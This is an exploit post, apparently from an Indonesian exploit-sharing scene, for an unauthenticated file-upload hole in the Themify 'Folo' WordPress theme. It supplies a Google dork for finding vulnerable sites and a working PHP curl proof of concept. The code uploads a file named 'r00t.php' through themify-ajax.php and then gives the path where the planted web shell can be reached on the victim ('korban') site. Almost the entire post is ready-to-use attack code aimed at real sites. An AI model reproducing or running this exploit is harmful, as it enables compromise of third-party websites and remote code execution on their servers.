Wordpress Folo Shell Upload

Exploit Title : Wordpress Themes Folo File Upload Vulnerability

#Vendor : http://themify.me/
#Download : http://themify.me/themes/folo
#Type : php, html, htm, asp, etc.
#Category : Web Application
#Vulnerability : File Upload
#Tested On : Windows 7 64-bit (mozilla firefox)

#Dork :inurl:/wp-content/themes/folo/ ( dork bisa agan kembangkn sndri)

  #POC :

$uploadfile=”r00t.php”;
$ch = curl_init(“http://korban/%5BPATH%5D/wp-content/themes/folo/themify/themify-ajax.php?upload=1″);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>

#Results See Your Shell On : http://korban/%5BPATH%5D/wp-content/themes/folo/uploads/{YOUR_FILE}.php